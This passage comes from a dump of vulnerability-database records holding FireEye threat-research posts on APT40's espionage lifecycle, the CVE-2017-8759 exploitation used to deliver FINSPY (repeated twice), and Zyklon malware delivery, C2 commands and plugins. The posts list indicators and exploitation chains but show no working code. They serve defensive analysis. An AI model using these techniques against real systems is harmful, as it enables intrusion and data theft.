Liberation Army Navy (PLAN) seized a U.S. Navy unmanned underwater vehicle (UUV) operating in the South China Sea. The incident paralleled China\u2019s actions in cyberspace; within a year APT40 was observed masquerading as a UUV manufacturer, and targeting universities engaged in naval research. That incident was one of many carried out to acquire advanced technology to support the development of Chinese naval capabilities. We believe APT40\u2019s emphasis on maritime issues and naval technology ultimately support China\u2019s ambition to establish a blue-water navy.\n\nIn addition to its maritime focus, APT40 engages in broader regional targeting against traditional intelligence targets, especially organizations with operations in Southeast Asia or involved in South China Sea disputes. Most recently, this has included [victims with connections to elections](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) in Southeast Asia, which is likely driven by events affecting China\u2019s Belt and Road Initiative. China\u2019s \u201cOne Belt, One Road\u201d (\u4e00\u5e26\u4e00\u8def) or \u201cBelt and Road Initiative\u201d (BRI) is a $1 trillion USD endeavor to build land and maritime trade routes across Asia, Europe, the Middle East, and Africa to develop a trade network that will project China\u2019s influence across the greater region.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/APT40/Figure%201c.png) \nFigure 1: Countries and industries targeted. Countries include the United States, United Kingdom, Norway, Germany, Saudi Arabia, Cambodia and Indonesia\n\n#### Attribution\n\nWe assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation. The actor\u2019s targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China. Analysis of the operational times of the group\u2019s activities indicates that it is probably centered around China Standard Time (UTC +8). In addition, multiple APT40 command and control (C2) domains were initially registered by China based domain resellers and had Whois records with Chinese location information, suggesting a China based infrastructure procurement process.\n\nAPT40 has also used multiple Internet Protocol (IP) addresses located in China to conduct its operations. In one instance, a log file recovered from an [open indexed server](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines. All of the logins to this C2 were from computers configured with Chinese language settings.\n\n#### Attack Lifecycle\n\n_Initial Compromise_\n\nAPT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises.\n\n * APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement.\n * The operation\u2019s spear-phishing emails typically leverage malicious attachments, although Google Drive links have also been observed.\n * APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure. Observed vulnerabilities include:\n * [CVE-2012-0158](<https://intelligence.fireeye.com/reports/12-19517>)\n * [CVE-2017-0199](<https://intelligence.fireeye.com/reports/17-00003493>)\n * [CVE-2017-8759](<https://intelligence.fireeye.com/reports/17-00010114>)\n * [CVE-2017-11882](<https://intelligence.fireeye.com/reports/17-00012724>)\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/APT40/Figure%202.png) \nFigure 2: APT40 attack lifecycle\n\n_Establish Foothold_\n\nAPT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups. In some cases, the group has used executables with code signing certificates to avoid detection.\n\n * First-stage backdoors such as AIRBREAK, FRESHAIR, and BEACON are used before downloading other payloads.\n * PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.\n * APT40 will often target VPN and remote desktop credentials to establish a foothold in a targeted environment. This methodology proves to be ideal as once these credentials are obtained, they may not need to rely as heavily on malware to continue the mission.\n\n_Escalate Privileges_\n\nAPT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes.\n\n * APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used alongside the AIRBREAK and BADFLICK backdoors.\n * Additionally, the Windows Sysinternals ProcDump utility and Windows Credential Editor (WCE) are believed to be used during intrusions as well.\n\n_Internal Reconnaissance_\n\nAPT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance. The group also leverages RDP, SSH, legitimate software within the victim environment, an array of native Windows capabilities, publicly available tools, as well as custom scripts to facilitate internal reconnaissance.\n\n * APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration.\n * APT40 frequently uses native Windows commands, such as net.exe, to conduct internal reconnaissance of a victim\u2019s environment.\n * Web shells are heavily relied on for nearly all stages of the attack lifecycle. Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups.\n\n_Lateral Movement_\n\nAPT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP). For each new system compromised, the group usually executes malware, performs additional reconnaissance, and steals data.\n\n * APT40 also uses native Windows utilities such as at.exe (a task scheduler) and net.exe (a network resources management tool) for lateral movement.\n * Publicly available tunneling tools are leveraged alongside distinct malware unique to the operation.\n * Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement.\n * APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services.\n\n_Maintain Presence_\n\nAPT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment. These tools enable continued control of key systems in the targeted network.\n\n * APT40 strongly favors web shells for maintaining presence, especially publicly available tools.\n * Tools used during the Establish Foothold phase also continue to be used in the Maintain Presence phase; this includes AIRBREAK and PHOTO.\n * Some APT40 malware tools can evade typical network detectiona by leveraging legitimate websites, such as GitHub, Google, and Pastebin for initial C2 communications.\n * Common TCP ports 80 and 443 are used to blend in with routine network traffic.\n\n_Complete Mission_\n\nCompleting missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft.\n\n#### Outlook and Implications\n\nDespite increased public attention, APT40 continues to conduct cyber espionage operations following a regular tempo, and we anticipate their operations will continue through at least the near and medium term. Based on APT40\u2019s broadening into election-related targets in 2017, we assess with moderate confidence that the group\u2019s future targeting will affect additional sectors beyond maritime, driven by events such as China\u2019s Belt and Road Initiative. In particular, as individual Belt and Road projects unfold, we are likely to see continued activity by APT40 which extends against the project\u2019s regional opponents.\n", "cvss3": {}, "published": "2019-03-04T13:00:00", "type": "fireeye", "title": "APT40: Examining a China-Nexus Espionage Actor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8759"], "modified": "2019-03-04T13:00:00", "id": "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "href": "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-10-11T08:32:49", "description": "FireEye recently detected a malicious Microsoft Office RTF document that leveraged [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>), a SOAP [WSDL](<https://msdn.microsoft.com/en-us/library/ms996486.aspx>) parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.\n\nFireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found [here](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>).\n\nFireEye email, endpoint and network products detected the malicious documents.\n\n#### Vulnerability Used to Target Russian Speakers\n\nThe malicious document, \u201c\u041f\u0440\u043e\u0435\u043a\u0442.doc\u201d (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).\n\nFINSPY malware, also reported as FinFisher or [WingBird](<http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf>), is available for purchase as part of a \u201clawful intercept\u201d capability. Based on this and previous use of [FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye\u2019s Dynamic Threat Intelligence system indicates that related activity, though potentially for a different client, might have occurred as early as July 2017.\n\n#### CVE-2017-8759 WSDL Parser Code Injection\n\nA code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method ([http://referencesource.microsoft.com/ - System.Runtime.Remoting/metadata/wsdlparser.cs,6111](<http://referencesource.microsoft.com/#System.Runtime.Remoting/metadata/wsdlparser.cs,6111>)). The IsValidUrl does not perform correct validation if provided data that contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/SOAP%200day/Fig1.png) \nFigure 1: Vulnerable WSDL Parser\n\nWhen multiple _address_ definitions are provided in a SOAP response, the code inserts the \u201c//base.ConfigureProxy(this.GetType(),\u201d string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that due to lack validation of CRLF, a System.Diagnostics.Process.Start method call is injected. The generated code will be compiled by csc.exe of .NET framework, and loaded by the Office executables as a DLL.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/SOAP%200day/Fig2.png) \nFigure 2: SOAP definition VS Generated code\n\n#### The In-the-Wild Attacks\n\nThe attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) documents we previously reported on. The malicious sampled contained an embedded SOAP monikers to facilitate exploitation (Figure 3).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/SOAP%200day/Fig3.png) \nFigure 3: SOAP Moniker\n\nThe payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in System.Runtime.Remoting.ni.dll of .NET framework, parses the content and generates a .cs source code at the working directory. The csc.exe of .NET framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4 shows an example library loaded as a result of exploitation.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/SOAP%200day/Fig4.png) \nFigure 4: DLL loaded\n\nUpon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve a HTA script named \u201cword.db\u201d from the same server. The HTA script removes the source code, compiled DLL and the PDB files from disk and then downloads and executes the FINSPY malware named \u201cleft.jpg,\u201d which in spite of the .jpg extension and \u201cimage/jpeg\u201d content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/SOAP%200day/Fig5.png) \nFigure 5: Live requests\n\nThe malware will be placed at %appdata%\\Microsoft\\Windows\\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process create chain under Process Monitor.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/SOAP%200day/Fig6.png) \nFigure 6: Process Created Chain\n\n#### The Malware\n\nThe \u201cleft.jpg\u201d (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine \u2013 among other anti-analysis techniques \u2013 to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of \"WininetStartupMutex0\".\n\n#### Conclusion\n\nCVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to \u201clawful intercept\u201d companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.\n\nIt is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero day being used to distribute FINSPY in April 2017, CVE-2017-0199 was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.\n\n#### Acknowledgement\n\nThank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and FireEye iSIGHT Intelligence for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-12T13:00:00", "type": "fireeye", "title": "FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-8759"], "modified": "2017-09-12T13:00:00", "id": "FIREEYE:A19A2394490AB386D95215A17EEA2FC0", "href": "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-08T00:43:24", "description": "FireEye recently detected a malicious Microsoft Office RTF document that leveraged [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>), a SOAP [WSDL](<https://msdn.microsoft.com/en-us/library/ms996486.aspx>) parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.\n\nFireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found [here](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>).\n\nFireEye email, endpoint and network products detected the malicious documents.\n\n#### Vulnerability Used to Target Russian Speakers\n\nThe malicious document, \u201c\u041f\u0440\u043e\u0435\u043a\u0442.doc\u201d (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).\n\nFINSPY malware, also reported as FinFisher or [WingBird](<http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf>), is available for purchase as part of a \u201clawful intercept\u201d capability. Based on this and previous use of [FINSPY](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html>), we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye\u2019s Dynamic Threat Intelligence system indicates that related activity, though potentially for a different client, might have occurred as early as July 2017.\n\n#### CVE-2017-8759 WSDL Parser Code Injection\n\nA code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method ([http://referencesource.microsoft.com/ - System.Runtime.Remoting/metadata/wsdlparser.cs,6111](<http://referencesource.microsoft.com/#System.Runtime.Remoting/metadata/wsdlparser.cs,6111>)). The IsValidUrl does not perform correct validation if provided data that contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/SOAP%200day/Fig1.png) \nFigure 1: Vulnerable WSDL Parser\n\nWhen multiple _address_ definitions are provided in a SOAP response, the code inserts the \u201c//base.ConfigureProxy(this.GetType(),\u201d string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that due to lack validation of CRLF, a System.Diagnostics.Process.Start method call is injected. The generated code will be compiled by csc.exe of .NET framework, and loaded by the Office executables as a DLL.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/SOAP%200day/Fig2.png) \nFigure 2: SOAP definition VS Generated code\n\n#### The In-the-Wild Attacks\n\nThe attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) documents we previously reported on. The malicious sampled contained an embedded SOAP monikers to facilitate exploitation (Figure 3).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/SOAP%200day/Fig3.png) \nFigure 3: SOAP Moniker\n\nThe payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in System.Runtime.Remoting.ni.dll of .NET framework, parses the content and generates a .cs source code at the working directory. The csc.exe of .NET framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4 shows an example library loaded as a result of exploitation.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/SOAP%200day/Fig4.png) \nFigure 4: DLL loaded\n\nUpon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve a HTA script named \u201cword.db\u201d from the same server. The HTA script removes the source code, compiled DLL and the PDB files from disk and then downloads and executes the FINSPY malware named \u201cleft.jpg,\u201d which in spite of the .jpg extension and \u201cimage/jpeg\u201d content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/SOAP%200day/Fig5.png) \nFigure 5: Live requests\n\nThe malware will be placed at %appdata%\\Microsoft\\Windows\\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process create chain under Process Monitor.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/SOAP%200day/Fig6.png) \nFigure 6: Process Created Chain\n\n#### The Malware\n\nThe \u201cleft.jpg\u201d (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine \u2013 among other anti-analysis techniques \u2013 to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of \"WininetStartupMutex0\".\n\n#### Conclusion\n\nCVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to \u201clawful intercept\u201d companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.\n\nIt is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this, the zero day being used to distribute FINSPY in April 2017, CVE-2017-0199 was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that source sold it to additional actors.\n\n#### Acknowledgement\n\nThank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and [FireEye iSIGHT Intelligence](<https://www.fireeye.com/solutions/isight-cyber-threat-intelligence-subscriptions.html>) for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-12T13:00:00", "type": "fireeye", "title": "FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-8759"], "modified": "2017-09-12T13:00:00", "id": "FIREEYE:E28F2F7E1B1F4BDA33635C841E315BCA", "href": "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:24:50", "description": "#### Introduction\n\nFireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware. Zyklon has been observed in the wild since early 2016 and provides myriad sophisticated capabilities.\n\nZyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.\n\n#### Infection Vector\n\nWe have observed this recent wave of Zyklon malware being delivered primarily through spam emails. The email typically arrives with an attached ZIP file containing a malicious DOC file (Figure 1 shows a sample lure).\n\nThe following industries have been the primary targets in this campaign:\n\n * Telecommunications\n * Insurance\n * Financial Services\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig1.png) \nFigure 1: Sample lure documents\n\n#### Attack Flow\n\n 1. Spam email arrives in the victim\u2019s mailbox as a ZIP attachment, which contains a malicious DOC file.\n 2. The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell based payload takes over.\n 3. The PowerShell script is responsible for downloading the final payload from C2 server to execute it.\n\nA visual representation of the attack flow and execution chain can be seen in Figure 2.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig2.png) \nFigure 2: Zyklon attack flow\n\n#### Infection Techniques\n\n##### CVE-2017-8759\n\nThis vulnerability was [discovered by FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017, and it is a vulnerability we have observed being exploited in the wild.\n\nThe DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Figure3.png) \nFigure 3: Embedded URL in OLE object\n\n##### CVE-2017-11882\n\nSimilarly, we have also observed actors leveraging another recently [discovered](<https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html>) vulnerability (CVE-2017-11882) in Microsoft Office. Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Figure4.png) \nFigure 4: Embedded URL in OLE object\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig5.png) \nFigure 5: HTTP GET request to download the next level payload\n\nThe downloaded file, _doc.doc,_ is XML-based and contains a PowerShell command (shown in Figure 6) that subsequently downloads the binary _Pause.ps1_.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig6.png) \nFigure 6: PowerShell command to download the Pause.ps1 payload\n\n##### Dynamic Data Exchange (DDE)\n\nDynamic Data Exchange (DDE) is the interprocess communication mechanism that is exploited to perform remote code execution. With the help of a PowerShell script (shown in Figure 7), the next payload (_Pause.ps1) _is downloaded.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig7.png) \nFigure 7: DDE technique used to download the Pause.ps1 payload\n\nOne of the unique approaches we have observed is the use of dot-less IP addresses (example: hxxp://258476380).\n\nFigure 8 shows the network communication of the _Pause.ps1_ download.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig8.png) \nFigure 8: Network communication to download the Pause.ps1 payload\n\n#### Zyklon Delivery\n\nIn all these techniques, the same domain is used to download the next level payload (_Pause.ps1_), which is another PowerShell script that is Base64 encoded (as seen in Figure 8).\n\nThe _Pause.ps1_ script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode. The APIs contain VirtualAlloc(), memset(), and CreateThread(). Figure 9 shows the decoded Base64 code.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig9.png) \nFigure 9: Base64 decoded Pause.ps1\n\nThe injected code is responsible for downloading the final payload from the server (see Figure 10). The final stage payload is a PE executable compiled with .Net framework.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig10.png) \nFigure 10: Network traffic to download final payload (words.exe)\n\nOnce executed, the file performs the following activities:\n\n 1. Drops a copy of itself in %AppData%\\svchost.exe\\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11).\n 2. Unpacks the code in memory via process hollowing. The MSIL file contains the packed core payload in its .Net resource section.\n 3. The unpacked code is Zyklon.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig11.png) \nFigure 11: XML configuration file to schedule the task\n\nThe Zyklon malware first retrieves the external IP address of the infected machine using the following:\n\n * api.ipify[.]org\n * ip.anysrc[.]net\n * myexternalip[.]com\n * whatsmyip[.]com\n\nThe Zyklon executable contains another encrypted file in its .Net resource section named _tor_. This file is decrypted and injected into an instance of _InstallUtiil.exe_, and functions as a Tor anonymizer.\n\n#### Command & Control Communication\n\nThe C2 communication of Zyklon is proxied through the Tor network. The malware sends a POST request to the C2 server. The C2 server is appended by the gate.php, which is stored in file memory. The parameter passed to this request is getkey=y. In response to this request, the C2 server responds with a Base64-encoded RSA public key (seen in Figure 12).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig12.png) \nFigure 12: Zyklon public RSA key\n\nAfter the connection is established with the C2 server, the malware can communicate with its control server using the commands shown in Table 1.\n\nCommand\n\n| \n\nAction \n \n---|--- \n \nsign\n\n| \n\nRequests system information \n \nsettings\n\n| \n\nRequests settings from C2 server \n \nlogs\n\n| \n\nUploads harvested passwords \n \nwallet\n\n| \n\nUploads harvested cryptocurrency wallet data \n \nproxy\n\n| \n\nIndicates SOCKS proxy port opened \n \nminer\n\n| \n\nCryptocurrency miner commands \n \nerror\n\n| \n\nReports errors to C2 server \n \nddos\n\n| \n\nDDoS attack commands \n \nTable 1: Zyklon accepted commands\n\nThe following figures show the initial request and subsequent server response for the \u201csettings\u201d (Figure 13), \u201csign\u201d (Figure 14), and \u201cddos\u201d (Figure 15) commands.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig13.png) \nFigure 13: Zyklon issuing \u201csettings\u201d command and subsequent server response\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig14.png) \nFigure 14: Zyklon issuing \u201csign\u201d command and subsequent server response\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/zyklon/Fig15.png) \nFigure 15: Zyklon issuing \u201cddos\u201d command and subsequent server response\n\n#### Plugin Manager\n\nZyklon downloads number of plugins from its C2 server. The plugin URL is stored in file in following format:\n\n * /plugin/index.php?plugin=<_Plugin_Name_>\n\nThe following plugins are found in the memory of the Zyklon malware:\n\n * /plugin/index.php?plugin=cuda\n * /plugin/index.php?plugin=minerd\n * /plugin/index.php?plugin=sgminer\n * /plugin/index.php?plugin=socks\n * /plugin/index.php?plugin=tor\n * /plugin/index.php?plugin=games\n * /plugin/index.php?plugin=software\n * /plugin/index.php?plugin=ftp\n * /plugin/index.php?plugin=email\n * /plugin/index.php?plugin=browser\n\nThe downloaded plugins are injected into: Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe.\n\n#### Additional Features\n\nThe Zyklon malware offers the following additional capabilities (via plugins):\n\n##### Browser Password Recovery\n\nZyklon HTTP can recover passwords from popular web browsers, including:\n\n * Google Chrome\n * Mozilla Firefox\n * Internet Explorer\n * Opera Browser\n * Chrome Canary/SXS\n * CoolNovo Browser\n * Apple Safari\n * Flock Browser\n * SeaMonkey 